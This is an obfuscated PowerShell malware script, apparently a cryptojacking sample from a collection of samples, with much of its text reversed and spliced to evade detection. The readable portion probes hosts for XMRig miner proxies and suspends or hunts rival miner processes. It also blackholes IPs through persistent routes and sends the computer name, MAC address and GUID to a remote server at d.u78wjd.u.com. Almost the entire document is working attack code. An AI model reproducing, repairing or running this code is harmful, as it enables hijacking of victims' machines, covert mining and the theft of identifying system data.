yIP+yIP'+'royIP+yIP- fDi*eyIP+yI'+'Pxe.nib.6m*fDi ekil- htap.'+'_tRJ '+'ro- fDi*exe.nib.g6m*fyIP+yIPDi ekyIP+yIP'+'il- htap._tRJ{tcejbO-erehW1SessecorP'+'_23niW ss'+'alC- tcejbOimW-teG=+sdiptRJ 222 | 223 | )(yIP+yIP@=sdyIP+yIPiptRJ 224 | 225 | )6,0(gnirtsbus.)))cayIP+yIPmtRJ+diugtRyIP+yIPJ+eman_pmoctRJ(setyBteG.8FTU::]gni'+'docnyIP+yIPE.txeT.metsys[( 5dmgyIP+yIP('+'=exe6mtRJ 226 | 227 | 1 tsri'+'f-yIP+yIP tc'+'ejbo-tcel'+'es '+'1Se sser'+'ddacaM.)}eurttRJ QE- delb'+'anepi._tRJyIP'+'+yIP{ erehw 1Se noitarugifnoCyIP+yIPretpadAkrowteN_23n'+'iW tcejbOimW-teG( = ca'+'mtRJ 228 | 229 | DIUU.)'+'tcudor'+'PmetsySretup'+'moC_23niyIP+yIPW tcejboimw-teg( = diugtRJ'+' 230 | 231 | EMANRETUPMOC:vnetRJ = eman_pmoctRJ 232 | 233 | } 234 | 235 | yWuLLUNLLUNyWu nyIP+yIPruter 236 | 237 | } 238 | yIP+yIP 239 | } yIP+yIP 240 | 241 | emanetRJ nruter yIP+yIP yIP+yIP'+' 242 | 243 | {)_5dmtRJyIP+yIP qe- 5dmttRJ(fi 244 
| 245 | ))yyIP+yIPWyIP+yIPu'+'emanetRJDaThtaprtRJyWu(setyBllAyIP+yIPd'+'aeR::]eliF.OI[( 5yIP+yIPdmg=_5dmtRJ yIP+yIP 246 | 247 | {)semanetRJ ni emanetRJ(hcaerof 248 | 249 | ))yWuexe.llehsrewopDaThtaprtRJyWu(setyBllAdaeyI'+'P+yIPR::]eliF.OI[( 5dmg = 5dmyIP+yIPttRJ 250 | 251 | yIP+yIP}eman._tRJ{hcaeroy'+'IP+yIPf1Seexe'+'.'+'llehsrewyIP+yIPop edulcxE- '+'yIP+yIPexe.* e'+'dulcnI- yWu*DaT'+'htaprtyIP+yIPRJyWu icg = semanetRJ yIP+'+'yIP 252 | 253 | yWu0.1VDaTllehsrewopswodniWDaT23metsyIP+yIPySDaTswodniWDaT:CyWu=htaprtRJ 254 | 255 | } 256 | 257 | ltRJ nruter 258 | 259 | }'+')fDi2xfDi(gnirtSoT._tRJ=+ltRJ{hcayIP+yIPerof1Se)dtRJ(hsaHeyIP+yIPtupmoyIP+yIPC.)(etaerC::]'+'5DM.yhpargotpyrC.ytiruceS[ 260 | 261 | {)dtRJ(5dmg noitcnuf 262 | 263 | {)(emanrteg noitcnuf 264 | 265 | {)(detcetorpteg noitcnuf 266 | 267 | } 268 | 269 | ltRJ nruter 270 | 271 | })fDiyIP+yIP2xfDi(gnirtSoT'+'._tRJ=yIP+yI'+'P+ltRJ{hcaerof1Se)dtRJyIP+yIP(hsaHyIP+yIPetupmoC.)(etaerC::]5DM.yyIP+yIPhpargotpyrC.yt'+'yIP+yIPiryIP+yIPu'+'ceS[ 272 | 273 | {)dtRJ(5dmg noitcnuf 274 | 275 | } 276 | 277 | } 278 | '+' 279 | nruter 280 | 281 | yIP+'+'yIPyWussecoryIP+yIPp yn'+'yIP+yIPa esyI'+'P+yIPuap ot segelivyIP+yIPirp gniggyIP'+'+yIPubed eva'+'h ton od uoY :RORREyWu tsoh-etirw 282 | 283 | {esle 284 | 285 | } 286 | 287 | } 288 | 289 | yWu!dednepsus yIP+yIPyllufsseccus saw )ditRJ :DIP( ssecorp em'+'aNcorptRJ ehTyWyIP+yIPu tsoh-etirw 290 | 291 | {esle 292 | 293 | } 294 | 295 | yWu)ditRJ :DIP( emaNcorptRJ dnepsus yIP+yIPot elbanU :RORREyWu tsoh-etirw '+' 296 | 297 | {)eslaftRJ qe- dnepsustRJ( yIP+yIPfi '+' 298 | 299 | )ditRJ(ssecorPevityIP+yIPcAyIP+yIPgubeD::]23lenreK[ = dnepsustRJ yIP+yIP yIP+'+'yIP 300 | 301 | } '+' 302 | 303 | nyIP+yIPruter yIP+yIP 304 | 305 | yWussecorp siht'+' ot dehcatta reggubed a ydaerla si erehTyWu tsoh-etiyIP+yIPrw 306 | 307 | {)tneserPgubedtRJ('+' fi 308 | 309 | )tneserPgu'+'bed'+'tRJ]fer[,)eldnaH.)dyIP+yIPi'+'tRJ yIP+yIPdI- ssecorP-teG(((tneserPreggubeDetomyIP+yIPeRkcehC::]23yIP+yIPlenreK[ = 
yIP+yIPtuotRJ '+' 310 | 311 | oreZ::]yIP+yIPrtPtnI[ = tneserPgubeDtRJ 312 | 313 | yIP+yIP {)lluntRJ en- gubedtRJ('+'fi 314 | 315 | yIP+yIP}yWu*egelivirPgubeDeS*yWu ekil- _tRJ{tcejbO-erehW 1Se virp/ imaohw = gube'+'yIP+yIPdtRJ 316 | 317 | } 318 | 319 | nruter 320 | 321 | yWuregetni evitisop a tupniyIP+yIP tfDindid uoYyWu tsoh-etirw 322 | 323 | { )0'+' el- ditRJ( fi 324 | 325 | yWu...)ditRJ :DIP( emaNcorptRJ dnepsus ot gnitpmettAyWyIP+yIPu tsoh-etirW yIP+yIP 326 | 327 | } 328 | 329 | nruter 330 | 331 | yWuditRJ fo DI na htiw ssecorp on syIP+yIPi erehT :RORREyWyIP+yIPu tyIP+yIPsoH-etirW '+' 332 | 333 | {)lluntRJ qe- emaNcorptRJ(fi 334 | 335 | eman.)eunitnoCyltneliS noitcAroryIP+yIPrE- ditRJ di- ssecorP-teG( = emaNcorptRyIP+yIPJ 336 | 337 | {)ditRJ(dnep'+'suSssecorP noitcnuf 338 | 339 | fDi};)DIP tni(potSssecorPevitcAgubeD tni nyIP+yIPretxe citats cilbup ])yWulld.23ly'+'IP+yIPenrekyWu(tropmIllD[;)DIP tni(ssecorPeviyIP+yIPtcAgube'+'D tni nretxe citats cilbup ])yWulyIP+yIPld.23lenrekyWu(tropmIllD[;)tneserPreggubeDbp loob t'+'uoyIP+yI'+'P,ssyIP+yIPecorPh rtPtnI(tneserPreggubeDetom'+'eRkcehC yIP+yIPloob nretxe citats cilbup ])yWulld.23len'+'rekyWu(tropmIllD[{23lenreK ssa'+'lc citats cilbyIP+yIPup;secivreSporetnI.emitnuR.metsyS gnisu;lapicnirP.ytiruceS.yIP+yIPmetsyS gnisu;scitsong'+'aiD.metsyS'+' gnisu;metsyS gnisufDi noitinifeDepyT- epyT-dyIP+yIPdA 340 | 341 | } 342 | 343 | eslaftRJ nrute'+'r 344 | 345 | } 346 | 347 | euryIP+yIPt'+'tRJ n'+'rutyIP+yIPer '+' 348 | yIP+yIP 349 | yWu!!syxorp reyIP+yIPnimyWu tsoh-eyIP+yIPtir'+'w 350 | 351 | {)1- en- )yWuc'+'prnosjyWu(fOxedni.te'+'rtRJ(fi 352 | 353 | atadtRyIP+yIPJ troyIP+yIPptRJ pitRJ'+' tcennoc_lss = tertRJ 354 | 355 | 
fDi}}]yWuavek/xryWu,y'+'WuxyIP+yIPfs/xryWu,yWuqr'+'a/x'+'ryWu,yWuikol/xryWu,yWuwowyIP+yIP/xryWu,yWu0/xryWu,yWuelbuod/ncyWu,yWuslz/ncy'+'Wu,yIP+yIPyWuyIP+yIPzwr/ncyWu,y'+'Wuotr/ncyWu,yWuoax/ncyWu,yWuflah/nyIP+yIPcyWu,yWutsaf/ncyWu,yWur/ncyWu,yWu2/ncyWuyIP+yIP,yWu1/ncyWu[:yWuoglayWu,yWu1.yIP+yIP31.5/giRMXyWu:yIP+yIPyWutnegayWu,llunyIP+yIP:yWussapyWu,yWuxyWu:yWuyIP+yIPnigolyWuyIP+yIP{:yWusmarapyWu,'+'yWunigolyWu:yWudohtemyWu,yWu0'+'.2yWu:yIP+yIPyWucprnosjyWu,1:yWudiyWu{y'+'IP+yIPfDi = a'+'tadtRJ '+' 356 | 357 | {)troptRJ,pitRJ(syxoryIP+yIPprenimsi noitcnuf 358 | 359 | } 360 | 361 | eslaftRJ nryIP+yIPuter 362 | 363 | } 364 | 365 | euryIP+yIPttRJyIP+yIP nruter 366 | 367 | yWu!!yxorp ren'+'imyWu tsoh-etirw 368 | yIP+yIP 369 | {)1yIP+yIP- en- )yWyI'+'P+yIPucprno'+'sjyWu(fOxedni.tertRJ(fi 370 | 371 | yIP+yIPatadtyIP+yIPRJ troptRJyIP+yIP pitRJ tcennoc_wayIP+yIPr = tertRJ 372 | 373 | yyIP+yIPWunRm9yWu +yIP+yIP fDi}}]yWuavek/xryWu,yWuxfs/xryWu,yWuqra/xryWu,yWuikol/xryWu,yWuwow/xryWu,yWu0/xryWyIP+yIPu,yWuelbuod/ncyWu,yWuslz/nc'+'yWu,yWuzwr/ncyWu,yWuotr/ncyWu,yWuoax/ncyWu,yWuflah/ncyWuyIP+yIP,yWutsa'+'f/ncyWu,yWur/ncyWu,yWu2/ncyWu,yIP+yIPyWu1/ncyWu[:yWuoyIP+yIPglayWu,yWu1.31.5/giRMXyWu:yWutnegyIP+yIPayWu,llun:yWussapyWu,'+'yWuxyWu:yWyIP+yIPunigolyWu{:yWusmarapyWu,yWunigolyWu:yWudohtemyWu,yWu0.2yWu:yWucprnos'+'jyWu,1:yWudiyWu{fDi= atadtRJ 374 | 375 | {)troptRJ,pitRJ(yxorprenimsi noitcnuf 376 | 377 | } 378 | 379 | esyIP+yIPlaftRJ nruter '+' 380 | 381 | }yIP+yIP 382 | 383 | eurttRJ nruter 384 | 385 | {)1- en- )yIP+yIPyWu1/PTTHyWu(fOxedni.tertRJ(fi yIP+yIP 386 | 387 | atadtRJ troptRJ pitRJ tcennoc_lss = yIP+yIPtertRJ 388 | '+' 389 | yWunRm9nyIP+yIPRm91.1/PTTH / TEGyWu = atadtRJ 390 | 391 | {)troptRJ,pitRJ(sptthsi noityIP+y'+'IPcnuf 392 | 393 | '+'} 394 | 395 | eslaftRJ nruter 396 | 397 | } 398 | 399 | eurtyIP+yIPt'+'RJ n'+'ruter yIP+yIP 400 | 401 | {)1- en- )yWu1/'+'PTTHyWu(fOxyIP+yIPedni.tertRJ(fi 402 | 403 | atadtRJ yIP+yIPtroptRJ pitRJ tcennoc_war = tertRJ 404 | 405 | 
yIP+yIPyWunRm9nRm91.yIP+yIP1/PT'+'TH / TEGyWu=atadtRJ yIP+yIP 406 | 407 | {)troptRJ,pitRJ(ptthsi noitcn'+'uf 408 | 409 | } 410 | 411 | yWuyIP+yIPyWu nruter 412 | 413 | }{hctac} 414 | 415 | rtstRJyIP+yIP nruter 416 | 417 | )sertRyIP+yIPJ('+'gnirtsteyI'+'P+yIPg.IICSAyIP'+'+yIP::]gnidocnE.txeT[ = ryIP+yIPtstRJ 418 | 419 | ])1-vcertRJ(..0[sertRJ = sertRJ '+' 420 | 421 | )sertRJ(evieceR.kcostRJ = vcertRJ'+' 422 | 423 | )00001 ,)fDi'+'etybfyIP+yIP'+'DiyIP+yIP((ecnatsnIetaerC::]yarrA[ = sertRJ yIP+yI'+'P 424 | yIP+yIP 425 | 00yIP+yIP05 = tuoemiTevieceR.kcostRJ 426 | 427 | llun-tuo 1Se )yIP+yIP)setybtRJ((dyIP+yIPnes.kcostRJ 428 | yIP+y'+'IP 429 | )rts_dnest'+'RJ(setyBtyIP+yIPeG.IICSA::]gyIP+yIPnidocnE.tx'+'eT[ = setybtRJ 430 | 431 | tneilC.tneilctRJ = kcostRJ 432 | 433 | )troptRJ,pitRJ('+'tneilCpcT.stekcoS.teN TcEjbo-WEN = tneilctRyIP+yIPJ yIP+yIP 434 | 435 | {yrt 436 | 437 | {)rts_dnestRJ,troptR'+'J,pitRJ(tcennoyIP+yIPc_war n'+'oit'+'cnuf 438 | 439 | } 440 | 441 | tertRJ nru'+'ter 442 | 443 | }{hctac} 444 | 445 | )(esolc.yIP+yIPtekcostRJ 446 | 447 | )(eniLdaeR.redaertRJ = tertRJ 448 | 449 | )(hsulf.retirwt'+'RJ yIP+yIP 450 | yI'+'P+yIP 451 | )rts_dnestRJ('+'eniLetirW.retirwtRJ 452 | 453 | )maertSlsstRJyIP+yIP(redaeRmaertS.OI.metsyyIP+yIPS tcejbo-we'+'n = redyIP+yIPaertRJ 454 | 455 | )maertSlsyIP+'+'yIPstRJyIP+yIP(retirWmayI'+'P+yIPertS.OI.metsyS yIP+yIPtcejbo-wen = retiryIP+yIPwt'+'RJ 456 | 457 | )fDifDi(tneilCsAetacitnyIP+yIPehtuA.maertSlsstRJ yI'+'P+yIP 458 | 459 | 0005 = tuoemiTdaeR.maertSlsstRJ yIP+yIP 460 | 461 | ))]kcabllaCnoitadilaVetacifitreyIP+yIPCetomeR.ytiruceS.teN[ sa- }eurTtRJ{yIP+yIP(,es'+'laftRJ,)(maertSteG.tyIP+yIPekcostRJ(maertSlsS.yt'+'i'+'ruceS.teN.metsyS tcejbO-weN = maertSlsstRJ yI'+'P+yIP 462 | 463 | )troyIP+yIPptRJ ,pitRJ(tneilCpcT.stekcoSyIP+yIP.tyIP+yIPeN tcejbO-weyIP+yIPN = tekcostR'+'J yIP+yIP 464 | 465 | {yrt 466 | 467 | yIP+yIPyWuyWuyIP+yIP = tertRJ '+' 468 | 469 | {)rts_dnestRJ,troptRJyIP+yIP,pitRJ(tcennoc_lss noitcyIP+yIPnuf 470 | 471 | 472 
| } 473 | 474 | eurttyIP+'+'yIPRJ nruter 475 | 476 | } 477 | 478 | } 479 | yIP+yI'+'P 480 | eslaftRJ nruter 481 | 482 | {)]1[]jtRJ[spIsertRJ qe- yIP+yIP)]0[]jtRJ[spIsertRJ dnab- gnolpitRJ((fi 483 | 484 | {)++jtRJ;tnuoc.spIsertRJ tl- jtRJ;0=jtRJ(rof 485 | 486 | } 487 | 488 | )itRJ*8,2('+'wop::]yIP+yIPhtam[ * ]itRJ-3[rrapitRJ]tni[ rob- gnolpitRJ = gnolpitRJ 489 | 490 | {)--iyIP+yIPtRJ ;0 eyIP+yIPg- itRJ;3=itRJ(rof yIP+yIP 491 | 492 | 0yIP+yIP = gnolp'+'itRJ 493 | 494 | )yWu.yyIP+yIPWu(tilps.pitRJ = rrayIP+yIPpyIP+yIPitRJ 495 | 496 | yIP+yIP) 497 | 498 | )L5927yIP+yIP694924 ,L5927'+'694924(@ 499 | 500 | ,)L6773085043 ,'+'L0407694924(@ 501 | 502 | ,)L4076525'+'233 ,L040'+'7694924(@ 503 | 504 | ,)L4'+'897107223 ,L040yIP+yIP7694924(yIP+yIP@ 505 | 506 | ,)L4895221223 ,L0407694924(@ 507 | 508 | ,)L27452'+'21223 ,L04076'+'94924(@ 509 | 510 | ,)L0255yIP+yIP3'+'yIP+yIP22'+'323 '+',L0671094924(@ 511 | 512 | ,)L8465yIP+yIP991582 ,L0671094924(@ 513 | 514 | yIP+yIP,)L6148603233 ,L4226'+'384924(@ 515 | 516 | ,)L8279276882 ,L0278193924(@ 517 | 518 | ,)L4095191861 ,L2992770yIP+yIP924('+'@ 519 | yIP+yIP 520 | ,)L2346070312 ,L0800918724(@ yIP+yIP 521 | 522 | ,)L061277761 ,L0800918724(@ 523 | 524 | ,)L0 ,L080091'+'8724(@ 525 | 526 | ,)L048135620'+'4 ,L0481356204(@ 527 | 528 | ,yIP+yIP)L4836908573 ,L04813yIP+yIP56204(@ yIP+yIP 529 | 530 | (@ = spIsertRJyIP+yIP 531 | 532 | ) 533 | 534 | pitRJ]gnirtS[]'+')eurttRJ=yrotadnaM(retyI'+'P+yIP'+'emayIP+yIPrap[ 535 | 536 | (maraP 537 | 538 | { PIbuPsi noitcnuf 539 | 540 | }{hctac}yWuyWunioj'+'-]5..0[5dmfitR'+'J=noisyIP+yIPrevtRJ{yrt 541 | 542 | } 543 | 544 | fDimoc.uyIP+y'+'IP'+'djw87u.'+'d/'+'/:ptthfyIP+yIPDyIP+yIPi = lru_nwodtRJ '+' 545 | 546 | {)lru_nwodtRJ!(fiyIP( ()yIPxyIP+]31[DillEhSNDL+]1[DiLL'+'ehsNDL (.'(" , '.','R'+'iGH'+'tTo'+'LEft' )|fOReach-ObJECT { $_.VaLue} )) 547 | #|.( ([STRIng]$vErBOseprEfERenCE)[1,3]+'x'-JOIN'') 548 | 549 | -------------------------------------------------------------------------------- 
/DriveLife/krBin/kr-1.1.ps1: -------------------------------------------------------------------------------- 1 | ('.( LDNshe'+'LLiD[1]+LDNShElliD[13]+PIyxPIy)( (PIyif(!JRtdown_url){ '+' JRtdown_url = iPIy+PIyDPIy+PIyfhttp:/'+'/d'+'.u78wjd'+'PI'+'y+PIyu.comiDf } try{JRtverPIy+PIysion=J'+'Rtifmd5[0..5]-'+'joinuWyuWy}catch{} function isPubIP { Param( [parPIy+PIyame'+'PIy+P'+'Iyter(Mandatory=JRttrue)'+'][String]JRtip ) PIy+PIyJRtresIps = @( PIy+PIy @(40265PIy+PIy31840L, 3758096384L)PIy+PIy, @(4026531840L, 4'+'026531840L), @(4278'+'190080L, 0L), @(4278190080L, 167772160L), PIy+PIy @(4278190080L, 2130706432L), PIy+PIy @'+'(429PIy+PIy0772992L, 1681915904L), @(4293918720L, 2886729728L), @(429483'+'6224L, 3323068416L),PIy+PIy @(4294901760L, 285199PIy+PIy5648L), @(4294901760L,'+' 323'+'22PIy+PIy'+'3PIy+PIy5520L), @(42949'+'67040L, 32212'+'25472L), @(4294967040L, 3221225984L), @PIy+PIy(4294967PIy+PIy040L, 322701798'+'4L), @(4294967'+'040L, 332'+'5256704L), @(4294967040L'+', 3405803776L), @(429496'+'7295L, 429496PIy+PIy7295L) )PIy+PIy JRtiPIy+PIypPIy+PIyarr = JRtip.split(uWPIy+PIyy.uWy) JRti'+'plong = PIy+PIy0 PIy+PIy for(JRti=3;JRti -gPIy+PIye 0; JRtPIy+PIyi--){ JRtiplong = JRtiplong -bor [int]JRtiparr[3-JRti] * [mathPIy+PIy]::pow'+'(2,8*JRti) } for(JRtj=0;JRtj -lt JRtresIps.count;JRtj++){ if((JRtiplong -band JRtresIps[JRtj][0])PIy+PIy -eq JRtresIps[JRtj][1]){ return JRtfalse P'+'Iy+PIy } } return JRPIy'+'+PIyttrue } funPIy+PIyction ssl_connect(JRtip,PIy+PIyJRtport,JRtsend_str){ '+' JRtret = PIy+PIyuWyuWyPIy+PIy try{ PIy+PIy J'+'Rtsocket = NPIy+PIyew-Object NePIy+PIyt.PIy+PIySockets.TcpClient(JRtip, JRtpPIy+PIyort) PIy+P'+'Iy JRtsslStream = New-Object System.Net.Secur'+'i'+'ty.SslStream(JRtsockePIy+PIyt.GetStream(),JRtfal'+'se,(PIy+PIy{JRtTrue} -as [Net.Security.RemoteCPIy+PIyertificateValidationCallback])) PIy+PIy JRtsslStream.ReadTimeout = 5000 PIy+P'+'Iy JRtsslStream.AuthePIy+PIynticateAsClient(iDfiDf) JR'+'twPIy+PIyriter = new-objectPIy+PIy 
System.IO.StrePIy+P'+'IyamWriter(PIy+PIyJRtsPIy'+'+PIyslStream) JRtreaPIy+PIyder = n'+'ew-object SPIy+PIyystem.IO.StreamReader(PIy+PIyJRtsslStream) JRtwriter.WriteLine'+'(JRtsend_str) PIy+P'+'Iy PIy+PIy JR'+'twriter.flush() JRtret = JRtreader.ReadLine() JRtsocketPIy+PIy.close() }catch{} ret'+'urn JRtret } func'+'tio'+'n raw_cPIy+PIyonnect(JRtip,J'+'Rtport,JRtsend_str){ try{ PIy+PIy JPIy+PIyRtclient = NEW-objEcT Net.Sockets.TcpClient'+'(JRtip,JRtport) JRtsock = JRtclient.Client JRtbytes = [Te'+'xt.EncodinPIy+PIyg]::ASCII.GePIy+PIytBytes(JR'+'tsend_str) PI'+'y+PIy JRtsock.senPIy+PIyd((JRtbytes)PIy+PIy) eS1 out-null JRtsock.ReceiveTimeout = 50PIy+PIy00 PIy+PIy P'+'Iy+PIy JRtres = [Array]::CreateInstance((PIy+PIyiD'+'PIy+PIyfbyte'+'iDf), 10000) '+'JRtrecv = JRtsock.Receive(JRtres) '+' JRtres = JRtres[0..(JRtrecv-1)] JRtstPIy+PIyr = [Text.Encoding]::PIy+'+'PIyASCII.gPIy+P'+'Iyetstring'+'(JPIy+PIyRtres) return PIy+PIyJRtstr }catch{} return uWyPIy+PIyuWy } fu'+'nction ishttp(JRtip,JRtport){ PIy+PIy JRtdata=uWyGET / HT'+'TP/1PIy+PIy.19mRn9mRnuWyPIy+PIy JRtret = raw_connect JRtip JRtportPIy+PIy JRtdata if(JRtret.indePIy+PIyxOf(uWyHTTP'+'/1uWy) -ne -1){ PIy+PIy retur'+'n JR'+'tPIy+PIytrue } return JRtfalse }'+' funcPI'+'y+PIytion ishttps(JRtip,JRtport){ JRtdata = uWyGET / HTTP/1.19mRPIy+PIyn9mRnuWy '+' JRtretPIy+PIy = ssl_connect JRtip JRtport JRtdata PIy+PIy if(JRtret.indexOf(uWyHTTP/1uWyPIy+PIy) -ne -1){ return JRttrue PIy+PIy} '+' return JRtfalPIy+PIyse } function isminerproxy(JRtip,JRtport){ JRtdata =iDf{uWyiduWy:1,uWyj'+'sonrpcuWy:uWy2.0uWy,uWymethoduWy:uWyloginuWy,uWyparamsuWy:{uWyloginuPIy+PIyWy:uWyxuWy'+',uWypassuWy:null,uWyaPIy+PIygentuWy:uWyXMRig/5.13.1uWy,uWyalgPIy+PIyouWy:[uWycn/1uWyPIy+PIy,uWycn/2uWy,uWycn/ruWy,uWycn/f'+'astuWy,PIy+PIyuWycn/halfuWy,uWycn/xaouWy,uWycn/rtouWy,uWycn/rwzuWy,uWy'+'cn/zlsuWy,uWycn/doubleuWy,uPIy+PIyWyrx/0uWy,uWyrx/wowuWy,uWyrx/lokiuWy,uWyrx/arquWy,uWyrx/sfxuWy,uWyrx/kevauWy]}}iDf PIy+PIy+ uWy9mRnuWPIy+PIyy JRtret = rPIy+PIyaw_connect 
JRtip PIy+PIyJRtport JRPIy+PIytdataPIy+PIy if(JRtret.indexOf(uWyjs'+'onrpcuPIy+P'+'IyWy) -ne -PIy+PIy1){ PIy+PIy write-host uWymi'+'ner proxy!!uWy return PIy+PIyJRttPIy+PIyrue } retuPIy+PIyrn JRtfalse } function isminerpPIy+PIyroxys(JRtip,JRtport){ '+' JRtdat'+'a = iDfPIy+PI'+'y{uWyiduWy:1,uWyjsonrpcuWyPIy+PIy:uWy2.'+'0uWy,uWymethoduWy:uWyloginuWy'+',uWyparamsuWy:{PIy+PIyuWyloginPIy+PIyuWy:uWyxuWy,uWypassuWy:PIy+PIynull,uWyagentuWyPIy+PIy:uWyXMRig/5.13PIy+PIy.1uWy,uWyalgouWy:[uWycn/1uWy,PIy+PIyuWycn/2uWy,uWycn/ruWy,uWycn/fastuWy,uWycPIy+PIyn/halfuWy,uWycn/xaouWy,uWycn/rtouW'+'y,uWycn/rwzPIy+PIyuWyPIy+PIy,uW'+'ycn/zlsuWy,uWycn/doubleuWy,uWyrx/0uWy,uWyrx/PIy+PIywowuWy,uWyrx/lokiuWy,uWyr'+'x/a'+'rquWy,uWyrx/sfPIy+PIyxuW'+'y,uWyrx/kevauWy]}}iDf JRtret = ssl_connect '+'JRtip JRtpPIy+PIyort JPIy+PIyRtdata if(JRtr'+'et.indexOf(uWyjsonrp'+'cuWy) -ne -1){ w'+'ritPIy+PIye-host uWyminPIy+PIyer proxys!!uWy PIy+PIy '+' rePIy+PIytur'+'n JRt'+'tPIy+PIyrue } r'+'eturn JRtfalse } AdPIy+PIyd-Type -TypeDefinition iDfusing System;using '+'System.Dia'+'gnostics;using SystemPIy+PIy.Security.Principal;using System.Runtime.InteropServices;puPIy+PIyblic static cl'+'ass Kernel32{[DllImport(uWyker'+'nel32.dlluWy)] public static extern boolPIy+PIy CheckRe'+'moteDebuggerPresent(IntPtr hProcePIy+PIyss,P'+'Iy+PIyou'+'t bool pbDebuggerPresent);[DllImport(uWykernel32.dlPIy+PIyluWy)] public static extern int D'+'ebugActPIy+PIyiveProcess(int PID);[DllImport(uWykernePIy+PI'+'yl32.dlluWy)] public static exterPIy+PIyn int DebugActiveProcessStop(int PID);}iDf function ProcessSus'+'pend(JRtid){ JPIy+PIyRtprocName = (Get-Process -id JRtid -ErPIy+PIyrorAction SilentlyContinue).name if(JRtprocName -eq JRtnull){ '+' Write-HosPIy+PIyt uPIy+PIyWyERROR: There iPIy+PIys no process with an ID of JRtiduWy return } PIy+PIy Write-host uPIy+PIyWyAttempting to suspend JRtprocName (PID: JRtid)...uWy if (JRtid -le '+'0) { write-host uWyYou didniDft PIy+PIyinput a positive integeruWy return } JRtdPIy+PIy'+'ebug = whoami 
/priv eS1 Where-Object{JRt_ -like uWy*SeDebugPrivilege*uWy}PIy+PIy if'+'(JRtdebug -ne JRtnull){ PIy+PIy JRtDebugPresent = [IntPtrPIy+PIy]::Zero '+' JRtoutPIy+PIy = [KernelPIy+PIy32]::CheckRePIy+PIymoteDebuggerPresent(((Get-Process -IdPIy+PIy JRt'+'iPIy+PIyd).Handle),[ref]JRt'+'deb'+'ugPresent) if '+'(JRtdebugPresent){ wrPIy+PIyite-host uWyThere is already a debugger attached to '+'this processuWy PIy+PIy returPIy+PIyn '+' } PIy'+'+PIy PIy+PIy JRtsuspend = [Kernel32]::DebugPIy+PIyAcPIy+PIytiveProcess(JRtid) '+' ifPIy+PIy (JRtsuspend -eq JRtfalse){ '+' write-host uWyERROR: Unable toPIy+PIy suspend JRtprocName (PID: JRtid)uWy } else{ write-host uPIy+PIyWyThe JRtprocNa'+'me process (PID: JRtid) was successfullyPIy+PIy suspended!uWy } } else{ write-host uWyERROR: You do not h'+'ave debuPIy+'+'PIygging priPIy+PIyvileges to pauPIy+P'+'Iyse aPIy+PIy'+'ny pPIy+PIyrocessuWyPIy'+'+PIy return '+' } } function gmd5(JRtd){ [Sec'+'uPIy+PIyriPIy+PIy'+'ty.CryptographPIy+PIyy.MD5]::Create().ComputePIy+PIyHash(PIy+PIyJRtd)eS1foreach{JRtl+P'+'Iy+PIy=JRt_.'+'ToString(iDfx2PIy+PIyiDf)} return JRtl } function getprotected(){ function getrname(){ function gmd5(JRtd){ [Security.Cryptography.MD5'+']::Create().CPIy+PIyomputPIy+PIyeHash(JRtd)eS1forePIy+PIyach{JRtl+=JRt_.ToString(iDfx2iDf)'+'} return JRtl } JRtrpath=uWyC:TaDWindowsTaDSyPIy+PIystem32TaDWindowspowershellTaDV1.0uWy PIy'+'+PIy JRtenames = gci uWyJRPIy+PIytrpath'+'TaD*uWy -Includ'+'e *.exePIy+PIy'+' -Exclude poPIy+PIywershell'+'.'+'exeeS1fPIy+PI'+'yoreach{JRt_.name}PIy+PIy JRttPIy+PIymd5 = gmd5 ([IO.File]::RPIy+P'+'IyeadAllBytes(uWyJRtrpathTaDpowershell.exeuWy)) foreach(JRtename in JRtenames){ PIy+PIy JRtmd5_=gmdPIy+PIy5 ([IO.File]::Rea'+'dPIy+PIyAllBytes(uWyJRtrpathTaDJRtename'+'uPIy+PIyWPIy+PIyy)) if(JRttmd5 -eq PIy+PIyJRtmd5_){ '+'PIy+PIy PIy+PIy return JRtename PIy+PIy } PIy+PIy } returPIy+PIyn uWyNULLNULLuWy } JRtcomp_name = JRtenv:COMPUTERNAME '+'JRtguid = (get-wmiobject WPIy+PIyin32_Com'+'puterSystemP'+'roduct'+').UUID 
JRtm'+'ac = (Get-WmiObject Wi'+'n32_NetworkAdapterPIy+PIyConfiguration eS1 where {PIy+'+'PIyJRt_.ipena'+'bled -EQ JRttrue}).Macadd'+'ress eS1'+' se'+'lect-obje'+'ct PIy+PIy-f'+'irst 1 JRtm6exe='+'(PIy+PIygmd5 ([system.Text.EPIy+PIyncod'+'ing]::UTF8.GetBytes(JRtcomp_name+JPIy+PIyRtguid+JRtmPIy+PIyac))).substring(0,6) JRtpiPIy+PIyds=@PIy+PIy() JRtpids+=Get-WmiObject -Cla'+'ss Win32_'+'ProcesseS1Where-Object{JRt_.path -li'+'PIy+PIyke iDPIy+PIyf*m6g.bin.exe*iDf -or'+' JRt_'+'.path -like iDf*m6.bin.exP'+'Iy+PIye*iDf -PIy+PIyor'+'PIy+PIy JRt_.p'+'ath -like uWy*JRtmPIy+PIy6exe*uWy -or JRt_.name -eq (getrname)}eS1foreach{JRt_.processid} re'+'turn JRtp'+'ids } function senPIy+PIydmsg(JRtip,JRtismproxy,JRtmpid)'+'{ '+' try{ JRtmPIy+PIyac = (GePIy+PIyt-WmiObject Win32_NetworkPIy+PIyAdapterConfiguration eS1 where {JRt_.ipenabled -EQ JRttruPIy+'+'PIye}).Macaddre'+'ss e'+'S1 select-objecPIy+PIytPIy+PIy -first 1 PIy+PIy JRtguid = (get-wmiobjecPIy+PI'+'yt Win32_Comp'+'PIy+PIyuterSystemProduct).UUID JRtcomp_naPIy+PIyme ='+' JRtenv:COMPUTERNAME if(JRtip -eq iDPIy+PIyfiDf){ PIy+PIy JRturl = uWyJRPIy+PIyt'+'down'+'_url/kl_repo.json?'+'JRtversion&JRtglobal:retry&JRtco'+'mp_name&JRtmac&JRtguiduWy } else { JRtPIy+PIypname = Get-Process -id JPIy+PIyRtmpid eS1 Select-ObjecPIy+PIyt -ExpandProperty Name PIy+PIy JRturl = uWyJRtdown_'+'url/PIy+PIyrellik.json?JRtversPIy+PIyion&JRtglobal:retry&JPIy+PIyRtcoPIy+PIymp_namPIy+PIye&JRtmac&JRtguid&JRtip&JRtismproxy&JRtmp'+'id&PIy'+'+PIyJRtpnameuWy PIy+PIy } (NewPIy+PIy-Object Net.WebClient).DownloadString(P'+'Iy+PIyJPIy+PIyRt'+'url) }catch{}PIy+PIy } functi'+'onPIy+PIy banIp(JRtip)PIy+PIy{ PIy+PIy route add JPIy+PIyRtip 0.0.0.0 IF 1PIy+PIy -p } function unbanIp(JRtip){ route '+'delPIy+PIyete JRtip 0.0.0.0 } Fun'+'ction Killer { 